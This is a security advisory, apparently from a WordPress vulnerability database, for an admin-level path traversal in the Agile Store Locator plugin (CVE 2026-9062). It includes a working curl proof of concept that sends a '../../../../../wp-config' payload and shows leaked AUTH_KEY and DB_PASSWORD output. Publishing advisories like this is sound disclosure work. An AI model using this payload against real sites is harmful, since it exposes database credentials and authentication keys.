Agile Store Locator < 1.6.9 – Admin+ Arbitrary File Read via Path Traversal | CVE 2026-9062

Description

The plugin does not validate a parameter before using it in a file path, allowing high-privileged users such as administrators to read arbitrary `.php` files from the server, including configuration files that contain database credentials and authentication keys.

Proof of Concept

## Prerequisites

1. Activate the Agile Store Locator plugin (v1.6.8 or earlier).
2. Log in as an Administrator (in a multisite, log in as a subsite Admin).

## Steps

1. Visit any Agile Store Locator admin page (e.g. `/wp-admin/admin.php?page=asl-settings`) and extract the `nounce` value embedded in the page (assigned to `ASL_REMOTE.nounce` and inside the `"nounce":"..."` JSON literal).

2. Read `wp-config.php` via the `reset_custom_template` AJAX handler:

```bash
curl -k -c jar -b jar -X POST 'https://target/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=asl_ajax_handler' \
  --data-urlencode 'sl-action=reset_custom_template' \
  --data-urlencode 'asl-nounce=<NONCE>' \
  --data-urlencode 'template=cards-templates' \
  --data-urlencode 'section=../../../../../wp-config'
```

The same exploit works against `sl-action=load_custom_template`.

3. The response is a JSON document containing the full contents of `wp-config.php` (including `AUTH_KEY`, `SECURE_AUTH_KEY`, `DB_PASSWORD`, etc.) in the `html` field:

```
{"success":true,"html":"<?php\n/** WPConfig ...\ndefine( 'AUTH_KEY', '...' );\n...","msg":"Default template is loaded"}
```

Note: the handler appends `.php` to the supplied path, so the read is limited to `.php` files. Any `.php` file accessible to the web server user can be read (plugin source files, mu-plugins, `wp-config.php`, etc.).